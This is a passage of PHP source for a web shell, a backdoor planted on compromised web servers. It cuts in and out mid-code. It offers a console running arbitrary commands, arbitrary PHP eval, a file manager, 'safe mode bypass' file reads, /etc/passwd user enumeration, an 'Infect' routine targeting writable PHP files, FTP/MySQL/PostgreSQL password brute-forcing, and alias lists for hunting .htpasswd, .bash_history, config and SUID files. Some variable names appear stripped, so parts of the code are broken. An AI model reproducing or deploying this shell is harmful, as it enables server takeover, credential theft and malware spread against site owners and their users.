					die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
			}
			echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value="submit"></form>';
			break;
		case 'touch':
			if( !empty($_POST['p3']) ) {
				$time = strtotime($_POST['p3']);
				if($time) {
					if(!touch($_POST['p1'],$time,$time))
						echo 'Fail!';
					else
						echo 'Touched!';
				} else echo 'Bad time format!';
			}
			clearstatcache();
			echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value="submit"></form>';
			break;
		/* () 12.2015 mitryz */
		case 'frame':
			$frameSrc = substr(htmlspecialchars($GLOBALS['cwd']), strlen(htmlspecialchars($_SERVER['DOCUMENT_ROOT'])));
			if ($frameSrc[0] != '/')
				$frameSrc = '/' . $frameSrc;
			if ($frameSrc[strlen($frameSrc) - 1] != '/')
				$frameSrc = $frameSrc . '/';
			$frameSrc = $frameSrc . htmlspecialchars($_POST['p1']);
			echo '<iframe width="100%" height="900px" scrolling="no" src='.$frameSrc.' onload="onload=height=contentDocument.body.scrollHeight"></iframe>';
			break;
	}
	echo '</div>';
	hardFooter();
}
if($os == 'win')
	$aliases = array(
		"List Directory" => "dir",
    	"Find index.php in current dir" => "dir /s /w /b index.php",
    	"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
    	"Show active connections" => "netstat -an",
    	"Show running services" => "net start",
    	"User accounts" => "net user",
    	"Show computers" => "net view",
		"ARP Table" => "arp -a",
		"IP Configuration" => "ipconfig /all"
	);
else
	$aliases = array(
  		"List dir" => "ls -lha",
		"list file attributes on a Linux second extended file system" => "lsattr -va",
  		"show opened ports" => "netstat -an | grep -i listen",
        "process status" => "ps aux",
		"Find" => "",
  		"find all suid files" => "find / -type f -perm -04000 -ls",
  		"find suid files in current dir" => "find . -type f -perm -04000 -ls",
  		"find all sgid files" => "find / -type f -perm -02000 -ls",
  		"find sgid files in current dir" => "find . -type f -perm -02000 -ls",
  		"find config.inc.php files" => "find / -type f -name config.inc.php",
  		"find config* files" => "find / -type f -name \"config*\"",
  		"find config* files in current dir" => "find . -type f -name \"config*\"",
  		"find all writable folders and files" => "find / -perm -2 -ls",
  		"find all writable folders and files in current dir" => "find . -perm -2 -ls",
  		"find all service.pwd files" => "find / -type f -name service.pwd",
  		"find service.pwd files in current dir" => "find . -type f -name service.pwd",
  		"find all .htpasswd files" => "find / -type f -name .htpasswd",
  		"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
  		"find all .bash_history files" => "find / -type f -name .bash_history",
  		"find .bash_history files in current dir" => "find . -type f -name .bash_history",
  		"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
  		"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
		"Locate" => "",
  		"locate httpd.conf files" => "locate httpd.conf",
		"locate vhosts.conf files" => "locate vhosts.conf",
		"locate proftpd.conf files" => "locate proftpd.conf",
		"locate psybnc.conf files" => "locate psybnc.conf",
		"locate my.conf files" => "locate my.conf",
		"locate admin.php files" =>"locate admin.php",
		"locate cfg.php files" => "locate cfg.php",
		"locate conf.php files" => "locate conf.php",
		"locate config.dat files" => "locate config.dat",
		"locate config.php files" => "locate config.php",
		"locate config.inc files" => "locate config.inc",
		"locate config.inc.php" => "locate config.inc.php",
		"locate config.default.php files" => "locate config.default.php",
		"locate config* files " => "locate config",
		"locate .conf files"=>"locate '.conf'",
		"locate .pwd files" => "locate '.pwd'",
		"locate .sql files" => "locate '.sql'",
		"locate .htpasswd files" => "locate '.htpasswd'",
		"locate .bash_history files" => "locate '.bash_history'",
		"locate .mysql_history files" => "locate '.mysql_history'",
		"locate .fetchmailrc files" => "locate '.fetchmailrc'",
		"locate backup files" => "locate backup",
		"locate dump files" => "locate dump",
		"locate priv files" => "locate priv"
	);
function actionConsole() {
    if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
        prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true);
        $_POST['p1'] .= ' 2>&1';
    } elseif(!empty($_POST['p1']))
        prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0);
	if(isset($_POST['ajax'])) {
		prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);
		ob_start();
		echo "d.cf.cmd.value='';
";
		$temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("
$ ".$_POST['p1']."
".ex($_POST['p1']),"

	\'"));
		if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match))	{
			if(@chdir($match[1])) {
				$GLOBALS['cwd'] = @getcwd();
				echo "c_='".$GLOBALS['cwd']."';";
			}
		}
		echo "d.cf.output.value+='".$temp."';";
		echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
		$temp = ob_get_clean();
		echo strlen($temp), "
", $temp;
		exit;
	}
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
		prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);
	hardHeader();
    echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');
var cur = 0;
function kp(e) {
	var n = (window.Event) ? e.which : e.keyCode;
	if(n == 38) {
		cur--;
		if(cur>=0)
			document.cf.cmd.value = cmds[cur];
		else
			cur++;
	} else if(n == 40) {
		cur++;
		if(cur < cmds.length)
			document.cf.cmd.value = cmds[cur];
		else
			cur--;
	}
}
function add(cmd) {
	cmds.pop();
	cmds.push(cmd);
	cmds.push('');
	cur = cmds.length-1;
}
</script>";
	echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><label><select name=alias>';
	foreach($GLOBALS['aliases'] as $n => $v) {
		if($v == '') {
			echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
			continue;
		}
		echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
	}
	
	echo '</select></label><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value="submit"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin-top:5px;" readonly>';
	if(!empty($_POST['p1'])) {
		echo htmlspecialchars("$ ".$_POST['p1']."
".ex($_POST['p1']));
	}
	echo '</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
	echo '</form></div><script>d.cf.cmd.focus();</script>';
	hardFooter();
}
function actionPhp() {
	if( isset($_POST['ajax']) ) {
		$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
		ob_start();
		eval($_POST['p1']);
		$temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"

	\'")."';
";
		echo strlen($temp), "
", $temp;
		exit; 
	}
	hardHeader();
	if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
		echo '<h1>PHP info</h1><div class=content>';
		ob_start();
		phpinfo();
		$tmp = ob_get_clean();
		$tmp = preg_replace('!body {.*}!msiU','',$tmp);
		$tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
		$tmp = preg_replace('!h1!msiU','h2',$tmp);
		$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
		$tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
		echo $tmp;
		echo '</div><br>';
	}
	if(empty($_POST['ajax'])&&!empty($_POST['p1']))
		$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
		echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
	echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
	if(!empty($_POST['p1'])) {
		ob_start();
		eval($_POST['p1']);
		echo htmlspecialchars(ob_get_clean());
	}
	echo '</pre></div>';
	hardFooter();
}
function actionFilesMan() {
    if (!empty ($_COOKIE['f']))
        $_COOKIE['f'] = @unserialize($_COOKIE['f']);
    
	if(!empty($_POST['p1'])) {
		switch($_POST['p1']) {
			case 'uploadFile':
				if ( is_array($_FILES['f']['tmp_name']) ) {
					foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) {
                        if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) {
                                echo "Can't upload file!";
							}
						}
					}
				break;
			case 'mkdir':
				if(!@mkdir($_POST['p2']))
					echo "Can't create new dir";
				break;
			case 'delete':
				function deleteDir($path) {
					$path = (substr($path,-1)=='/') ? $path:$path.'/';
					$dh  = opendir($path);
					while ( ($ = readdir($dh) ) !== false) {
						$ = $path.$;
						if ( (basename($) == "..") || (basename($) == ".") )
							continue;
						$type = filetype($);
						if ($type == "dir")
							deleteDir($);
						else
							@unlink($);
					}
					closedir($dh);
					@rmdir($path);
				}
				if(is_array(@$_POST['f']))
					foreach($_POST['f'] as $f) {
                        if($f == '..')
                            continue;
						$f = urldecode($f);
						if(is_dir($f))
							deleteDir($f);
						else
							@unlink($f);
					}
				break;
			case 'paste':
				if($_COOKIE['act'] == 'copy') {
					function copy_paste($c,$s,$d){
						if(is_dir($c.$s)){
							mkdir($d.$s);
							$h = @opendir($c.$s);
							while (($f = @readdir($h)) !== false)
								if (($f != ".") and ($f != ".."))
									copy_paste($c.$s.'/',$f, $d.$s.'/');
						} elseif(is_file($c.$s))
							@copy($c.$s, $d.$s);
					}
					foreach($_COOKIE['f'] as $f)
						copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']);
				} elseif($_COOKIE['act'] == 'move') {
					function move_paste($c,$s,$d){
						if(is_dir($c.$s)){
							mkdir($d.$s);
							$h = @opendir($c.$s);
							while (($f = @readdir($h)) !== false)
								if (($f != ".") and ($f != ".."))
									copy_paste($c.$s.'/',$f, $d.$s.'/');
						} elseif(@is_file($c.$s))
							@copy($c.$s, $d.$s);
					}
					foreach($_COOKIE['f'] as $f)
						@rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f);
				} elseif($_COOKIE['act'] == 'zip') {
					if(class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        if ($zip->open($_POST['p2'], 1)) {
                            chdir($_COOKIE['c']);
                            foreach($_COOKIE['f'] as $f) {
                                if($f == '..')
                                    continue;
                                if(@is_file($_COOKIE['c'].$f))
                                    $zip->addFile($_COOKIE['c'].$f, $f);
                                elseif(@is_dir($_COOKIE['c'].$f)) {
                                    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
                                    foreach ($iterator as $key=>$value) {
                                        $zip->addFile(realpath($key), $key);
                                    }
                                }
                            }
                            chdir($GLOBALS['cwd']);
                            $zip->close();
                        }
                    }
				} elseif($_COOKIE['act'] == 'unzip') {
					if(class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        foreach($_COOKIE['f'] as $f) {
                            if($zip->open($_COOKIE['c'].$f)) {
                                $zip->extractTo($GLOBALS['cwd']);
                                $zip->close();
                            }
                        }
                    }
				} elseif($_COOKIE['act'] == 'tar') {
                    chdir($_COOKIE['c']);
                    $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
                    ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
                    chdir($GLOBALS['cwd']);
				}
				unset($_COOKIE['f']);
                setcookie('f', '', time() - 3600);
				break;
			default:
                if(!empty($_POST['p1'])) {
					prototype('act', $_POST['p1']);
					prototype('f', serialize(@$_POST['f']));
					prototype('c', @$_POST['c']);
				}
				break;
		}
	}
    hardHeader();
	echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
	$dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
	if($dirContent === false) {	echo 'Can\'t open this folder!';hardFooter(); return; }
	global $sort;
	$sort = array('name', 1);
	if(!empty($_POST['p1'])) {
		if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
			$sort = array($match[1], (int)$match[2]);
	}
echo "<script>
	function sa() {
		for(i=0;i<d.files.elements.length;i++)
			if(d.files.elements[i].type == 'checkbox')
				d.files.elements[i].checked = d.files.elements[0].checked;
	}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
	$dirs = $files = array();
	$n = count($dirContent);
	for($i=0;$i<$n;$i++) {
		$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
		$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
		$tmp = array('name' => $dirContent[$i],
					 'path' => $GLOBALS['cwd'].$dirContent[$i],
					 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
					 'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
					 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
					 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
					 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
					);
		if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
			$files[] = array_merge($tmp, array('type' => 'file'));
		elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
			$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
		elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&&($dirContent[$i] != "."))
			$dirs[] = array_merge($tmp, array('type' => 'dir'));
	}
	$GLOBALS['sort'] = $sort;
	function cmp($a, $b) {
		if($GLOBALS['sort'][0] != 'size')
			return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
		else
			return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
	}
	usort($files, "cmp");
	usort($dirs, "cmp");
	$files = array_merge($dirs, $files);
	$l = 0;
	foreach($files as $f) {
		echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
			.'</td><td><a class="tooltip" data-tooltip="Rename" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a class="tooltip" data-tooltip="Touch" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a class="tooltip" data-tooltip="Frame" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'frame\')">F</a> <a class="tooltip" data-tooltip="Edit" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a class="tooltip" data-tooltip="Download" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
		$l = $l?0:1;
	}
	echo "<tr id=fak><td colspan=7>
	<input type=hidden name=ne value=''>
	<input type=hidden name=a value='FilesMan'>
	<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
	<input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
	<label><select name='p1'>";
	if(!empty($_COOKIE['act']) && @count($_COOKIE['f']))
        echo "<option value='paste'> Paste</option>";
	echo "<option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
    if(class_exists('ZipArchive'))
        echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>";
    echo "<option value='tar'>+ tar.gz</option>";
    echo "</select></label>";
    if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
        echo "&nbsp;file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>&nbsp;";
    echo "<input type='submit' value='submit'></td></tr></form></table></div>";
	hardFooter();
}
function actionStringTools() {
	if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
    if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
	if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
	if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
	if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
	$stringTools = array(
		'Base64 encode' => 'base64_encode',
		'Base64 decode' => 'base64_decode',
		'Url encode' => 'urlencode',
		'Url decode' => 'urldecode',
		'Full urlencode' => 'full_urlencode',
		'md5 hash' => 'md5',
		'sha1 hash' => 'sha1',
		'crypt' => 'crypt',
		'CRC32' => 'crc32',
		'ASCII to HEX' => 'ascii2hex',
		'HEX to ASCII' => 'hex2ascii',
		'HEX to DEC' => 'hexdec',
		'HEX to BIN' => 'hex2bin',
		'DEC to HEX' => 'dechex',
		'DEC to BIN' => 'decbin',
		'BIN to HEX' => 'binhex',
		'BIN to DEC' => 'bindec',
		'String to lower case' => 'strtolower',
		'String to upper case' => 'strtoupper',
		'Htmlspecialchars' => 'htmlspecialchars',
		'String length' => 'strlen',
	);
	if(isset($_POST['ajax'])) {
		prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);
		ob_start();
		if(in_array($_POST['p1'], $stringTools))
			echo $_POST['p1']($_POST['p2']);
		$temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"

	\'")."';
";
		echo strlen($temp), "
", $temp;
		exit;
	}
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
		prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);
	hardHeader();
	echo '<h1>String conversions</h1><div class=content>';
	echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><label><select name='selectTool'>";
	foreach($stringTools as $k => $v)
		echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
		echo "</select></label><input type='submit' value='submit'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
	if(!empty($_POST['p1'])) {
		if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
	}
	echo"</pre></div><br><h1>Search files:</h1><div class=content>
		<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
			<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
			<tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
			<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
			<tr><td></td><td><input type='submit' value='submit'></td></tr>
			</table></form>";
	function hardRecursiveGlob($path) {
		if(substr($path, -1) != '/')
			$path.='/';
		$paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
		if(is_array($paths)&&@count($paths)) {
			foreach($paths as $) {
				if(@is_dir($)){
					if($path!=$)
						hardRecursiveGlob($);
				} else {
					if(empty($_POST['p2']) || @strpos(file_get_contents($), $_POST['p2'])!==false)
						echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($)."\", \"view\",\"\")'>".htmlspecialchars($)."</a><br>";
				}
			}
		}
	}
	if(@$_POST['p3'])
		hardRecursiveGlob($_POST['c']);
	echo "</div><br><h1>Search for hash:</h1><div class=content>
		<form method='post' target='_blank' name='hf'>
			<input type='text' name='hash' style='width:200px;'><br>
            <input type='hidden' name='act' value='find'/>
			<input type='submit' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
			<input type='submit' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
            <input type='submit' value='fakenamegenerator.com' onclick=\"document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()\"><br>
			<input type='submit' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
			<input type='submit' value='toolki.com' onclick=\"document.hf.action='http://toolki.com/';document.hf.submit()\"><br>
			<input type='submit' value='fopo.com.ar' onclick=\"document.hf.action='http://fopo.com.ar/';document.hf.submit()\"><br>
			<input type='submit' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
		</form></div>";
	hardFooter();
}
function actionSafeMode() {
	$temp='';
	ob_start();
	switch($_POST['p1']) {
		case 1:
			$temp=@tempnam($test, 'cx');
			if(@copy("compress.zlib://".$_POST['p2'], $temp)){
				echo @file_get_contents($temp);
				unlink($temp);
			} else
				echo 'Sorry... Can\'t open file';
			break;
		case 2:
			$files = glob($_POST['p2'].'*');
			if( is_array($files) )
				foreach ($files as $filename)
					echo $filename."
";
			break;
		case 3:
			$ch = curl_init("file://".$_POST['p2']."".SELF_PATH);
			curl_exec($ch);
			break;
		case 4:
			ini_restore("safe_mode");
			ini_restore("open_basedir");
			include($_POST['p2']);
			break;
		case 5:
			for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
				$uid = @posix_getpwuid($_POST['p2']);
				if ($uid)
					echo join(':',$uid)."
";
			}
			break;
		case 6:
			if(!function_exists('imap_open'))break;
			$stream = imap_open($_POST['p2'], "", "");
			if ($stream == FALSE)
				break;
			echo imap_body($stream, 1);
			imap_close($stream);
			break;
	}
	$temp = ob_get_clean();
	hardHeader();
	echo '<h1>Safe mode bypass</h1><div class=content>';
	echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value="submit"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value="submit"></form>';
	if($temp)
		echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
	echo '</div>';
	hardFooter();
}
function actionLogout() {
    setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
	die('bye!');
}
function actionSelfRemove() {
	if($_POST['p1'] == 'yes')
		if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
			die('Shell has been removed');
		else
			echo 'unlink error!';
    if($_POST['p1'] != 'yes')
        hardHeader();
	echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
	hardFooter();
}
function actionInfect() {
	hardHeader();
	echo '<h1>Infect</h1><div class=content>';
	if($_POST['p1'] == 'infect') {
		$target=$_SERVER['DOCUMENT_ROOT'];
			function ListFiles($dir) {
				if($dh = opendir($dir)) {
					$files = Array();
					$inner_files = Array();
					while($file = readdir($dh)) {
						if($file != "." && $file != "..") {
							if(is_dir($dir . "/" . $file)) {
								$inner_files = ListFiles($dir . "/" . $file);
								if(is_array($inner_files)) $files = array_merge($files, $inner_files); 
							} else {
								array_push($files, $dir . "/" . $file);
							}
						}
					}
					closedir($dh);
					return $files;
				}
			}
			foreach (ListFiles($target) as $key=>$file){
				$nFile = substr($file, -4, 4);
				if($nFile == ".php" ){
					if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){
						echo "$file<br>";
						$i++;
					}
				}
			}
			echo "<font color=red size=14>$i</font>";
		}else{
			echo "<form method=post><input type=submit value=Infect name=infet></form>";
			echo 'Really want to infect the server?&nbsp;<a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
		}
	hardFooter();
}
function actionBruteforce() {
	hardHeader();
	if( isset($_POST['proto']) ) {
		echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
		if( $_POST['proto'] == 'ftp' ) {
			function bruteForce($ip,$port,$login,$pass) {
				$fp = @ftp_connect($ip, $port?$port:21);
				if(!$fp) return false;
				$res = @ftp_login($fp, $login, $pass);
				@ftp_close($fp);
				return $res;
			}
		} elseif( $_POST['proto'] == 'mysql' ) {
			function bruteForce($ip,$port,$login,$pass) {
				$res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass);
				@mysql_close($res);
				return $res;
			}
		} elseif( $_POST['proto'] == 'pgsql' ) {
			function bruteForce($ip,$port,$login,$pass) {
				$str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
				$res = @pg_connect($str);
				@pg_close($res);
				return $res;
			}
		}
		$success = 0;
		$attempts = 0;
		$server = explode(":", $_POST['server']);
		if($_POST['type'] == 1) {
			$temp = @file('/etc/passwd');
			if( is_array($temp) )
				foreach($temp as $line) {
					$line = explode(":", $line);
					++$attempts;
					if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
						$success++;
						echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
					}
					if(@$_POST['reverse']) {
						$tmp = "";
						for($i=strlen($line[0])-1; $i>=0; --$i)
							$tmp .= $line[0][$i];
						++$attempts;
						if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
							$success++;
							echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
						}
					}
				}
		} elseif($_POST['type'] == 2) {
			$temp = @file($_POST['dict']);
			if( is_array($temp) )
				foreach($temp as $line) {
					$line = trim($line);
					++$attempts;
					if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
						$success++;
						echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
					}
				}
		}
		echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
	}
	echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
